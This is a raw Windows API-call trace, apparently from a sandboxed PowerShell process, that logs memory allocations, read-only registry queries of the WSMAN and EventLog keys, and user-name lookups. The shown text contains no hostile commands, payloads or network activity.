	[0290.595] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0290.595] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x1, lpValueName=0x314ad0, lpcchValueName=0x12d4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0290.595] CoTaskMemFree (pv=0x314ad0) 
	[0290.595] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0290.595] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x2, lpValueName=0x314ad0, lpcchValueName=0x12d4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0290.595] CoTaskMemFree (pv=0x314ad0) 
	[0290.596] RegQueryValueExW (in: hKey=0x1d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d48c, lpData=0x0, lpcbData=0x12d488*=0x0 | out: lpType=0x12d48c*=0x1, lpData=0x0, lpcbData=0x12d488*=0x8) returned 0x0
	[0290.596] CoTaskMemAlloc (cb=0xc) returned 0x37e4a0
	[0290.596] RegQueryValueExW (in: hKey=0x1d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d45c, lpData=0x37e4a0, lpcbData=0x12d458*=0x8 | out: lpType=0x12d45c*=0x1, lpData="2.0", lpcbData=0x12d458*=0x8) returned 0x0
	[0290.596] CoTaskMemFree (pv=0x37e4a0) 
	[0291.490] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d448 | out: phkResult=0x12d448*=0x304) returned 0x0
	[0291.491] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d34c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d348*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0291.491] CoTaskMemFree (pv=0x0) 
	[0291.491] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0291.491] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x314ad0, lpcchValueName=0x12d3f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d3f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0291.491] CoTaskMemFree (pv=0x314ad0) 
	[0291.491] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0291.491] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x314ad0, lpcchValueName=0x12d3f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d3f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0291.491] CoTaskMemFree (pv=0x314ad0) 
	[0291.491] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0291.491] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x314ad0, lpcchValueName=0x12d3f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d3f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0291.491] CoTaskMemFree (pv=0x314ad0) 
	[0291.491] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d3dc, lpData=0x0, lpcbData=0x12d3d8*=0x0 | out: lpType=0x12d3dc*=0x1, lpData=0x0, lpcbData=0x12d3d8*=0x8) returned 0x0
	[0291.491] CoTaskMemAlloc (cb=0xc) returned 0x37e520
	[0291.491] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d3ac, lpData=0x37e520, lpcbData=0x12d3a8*=0x8 | out: lpType=0x12d3ac*=0x1, lpData="2.0", lpcbData=0x12d3a8*=0x8) returned 0x0
	[0291.491] CoTaskMemFree (pv=0x37e520) 
	[0291.492] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0291.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0291.492] CoTaskMemFree (pv=0x389720) 
	[0292.196] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0292.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.197] CoTaskMemFree (pv=0x389720) 
	[0292.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d478 | out: phkResult=0x12d478*=0x308) returned 0x0
	[0292.206] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d3ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d3ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.206] CoTaskMemFree (pv=0x0) 
	[0292.207] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.207] CoTaskMemFree (pv=0x314ad0) 
	[0292.207] CoTaskMemFree (pv=0x0) 
	[0292.208] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.208] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.208] CoTaskMemFree (pv=0x314ad0) 
	[0292.208] CoTaskMemFree (pv=0x0) 
	[0292.208] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.208] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.208] CoTaskMemFree (pv=0x314ad0) 
	[0292.208] CoTaskMemFree (pv=0x0) 
	[0292.208] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.208] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.208] CoTaskMemFree (pv=0x314ad0) 
	[0292.208] CoTaskMemFree (pv=0x0) 
	[0292.208] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.208] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.208] CoTaskMemFree (pv=0x314ad0) 
	[0292.208] CoTaskMemFree (pv=0x0) 
	[0292.208] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.208] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.209] CoTaskMemFree (pv=0x314ad0) 
	[0292.209] CoTaskMemFree (pv=0x0) 
	[0292.209] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.209] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.209] CoTaskMemFree (pv=0x314ad0) 
	[0292.209] CoTaskMemFree (pv=0x0) 
	[0292.209] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.209] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.209] CoTaskMemFree (pv=0x314ad0) 
	[0292.209] CoTaskMemFree (pv=0x0) 
	[0292.209] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0292.209] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x314ad0, lpcchName=0x12d478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0292.209] CoTaskMemFree (pv=0x314ad0) 
	[0292.209] CoTaskMemFree (pv=0x0) 
	[0292.209] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x30c) returned 0x0
	[0292.209] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.210] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x320) returned 0x0
	[0292.210] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.210] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x328) returned 0x0
	[0292.210] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.210] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x32c) returned 0x0
	[0292.210] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.210] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x330) returned 0x0
	[0292.210] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.210] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x334) returned 0x0
	[0292.211] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.211] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x338) returned 0x0
	[0292.211] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.211] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x33c) returned 0x0
	[0292.211] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x0) returned 0x2
	[0292.211] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x340) returned 0x0
	[0292.211] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4d8 | out: phkResult=0x12d4d8*=0x344) returned 0x0
	[0292.211] RegCloseKey (hKey=0x344) returned 0x0
	[0292.212] RegCloseKey (hKey=0x308) returned 0x0
	[0292.212] RegCloseKey (hKey=0x340) returned 0x0
	[0292.225] CoTaskMemAlloc (cb=0x804) returned 0x1b919480
	[0292.225] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b919480, nSize=0x12d6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6e8) returned 0x1
	[0293.197] CoTaskMemFree (pv=0x1b919480) 
	[0293.198] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0293.198] GetUserNameW (in: lpBuffer=0x314ad0, pcbBuffer=0x12d728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d728) returned 1
	[0293.198] CoTaskMemFree (pv=0x314ad0) 
	[0294.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d428 | out: phkResult=0x12d428*=0x348) returned 0x0
	[0294.022] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d39c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d398*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.022] CoTaskMemFree (pv=0x0) 
	[0294.022] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.022] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.022] CoTaskMemFree (pv=0x314ad0) 
	[0294.022] CoTaskMemFree (pv=0x0) 
	[0294.022] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.022] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.022] CoTaskMemFree (pv=0x314ad0) 
	[0294.022] CoTaskMemFree (pv=0x0) 
	[0294.022] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.022] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.022] CoTaskMemFree (pv=0x314ad0) 
	[0294.022] CoTaskMemFree (pv=0x0) 
	[0294.022] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.022] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.022] CoTaskMemFree (pv=0x314ad0) 
	[0294.022] CoTaskMemFree (pv=0x0) 
	[0294.022] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.023] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.023] CoTaskMemFree (pv=0x314ad0) 
	[0294.023] CoTaskMemFree (pv=0x0) 
	[0294.023] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.023] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.023] CoTaskMemFree (pv=0x314ad0) 
	[0294.023] CoTaskMemFree (pv=0x0) 
	[0294.023] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.023] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.023] CoTaskMemFree (pv=0x314ad0) 
	[0294.023] CoTaskMemFree (pv=0x0) 
	[0294.023] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.023] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.023] CoTaskMemFree (pv=0x314ad0) 
	[0294.023] CoTaskMemFree (pv=0x0) 
	[0294.023] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.023] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.023] CoTaskMemFree (pv=0x314ad0) 
	[0294.023] CoTaskMemFree (pv=0x0) 
	[0294.023] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x34c) returned 0x0
	[0294.024] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.024] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x350) returned 0x0
	[0294.024] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.024] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x354) returned 0x0
	[0294.024] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.024] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x358) returned 0x0
	[0294.024] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.024] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x35c) returned 0x0
	[0294.024] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.025] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x360) returned 0x0
	[0294.025] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.025] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x364) returned 0x0
	[0294.025] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.025] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x368) returned 0x0
	[0294.025] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x0) returned 0x2
	[0294.025] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x36c) returned 0x0
	[0294.025] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d488 | out: phkResult=0x12d488*=0x370) returned 0x0
	[0294.026] RegCloseKey (hKey=0x370) returned 0x0
	[0294.026] RegCloseKey (hKey=0x348) returned 0x0
	[0294.026] RegCloseKey (hKey=0x36c) returned 0x0
	[0294.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d428 | out: phkResult=0x12d428*=0x36c) returned 0x0
	[0294.027] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d39c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d398*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.027] CoTaskMemFree (pv=0x0) 
	[0294.027] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.027] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.027] CoTaskMemFree (pv=0x314ad0) 
	[0294.027] CoTaskMemFree (pv=0x0) 
	[0294.027] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.027] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.028] CoTaskMemFree (pv=0x314ad0) 
	[0294.028] CoTaskMemFree (pv=0x0) 
	[0294.028] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.028] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.028] CoTaskMemFree (pv=0x314ad0) 
	[0294.028] CoTaskMemFree (pv=0x0) 
	[0294.028] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.028] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.028] CoTaskMemFree (pv=0x314ad0) 
	[0294.028] CoTaskMemFree (pv=0x0) 
	[0294.028] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.028] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.028] CoTaskMemFree (pv=0x314ad0) 
	[0294.028] CoTaskMemFree (pv=0x0) 
	[0294.028] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.028] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.029] CoTaskMemFree (pv=0x314ad0) 
	[0294.029] CoTaskMemFree (pv=0x0) 
	[0294.029] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0294.029] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x314ad0, lpcchName=0x12d428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0294.029] CoTaskMemFree (pv=0x314ad0) 
	[0294.029] CoTaskMemFree (pv=0x0) 
	[0294.029] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
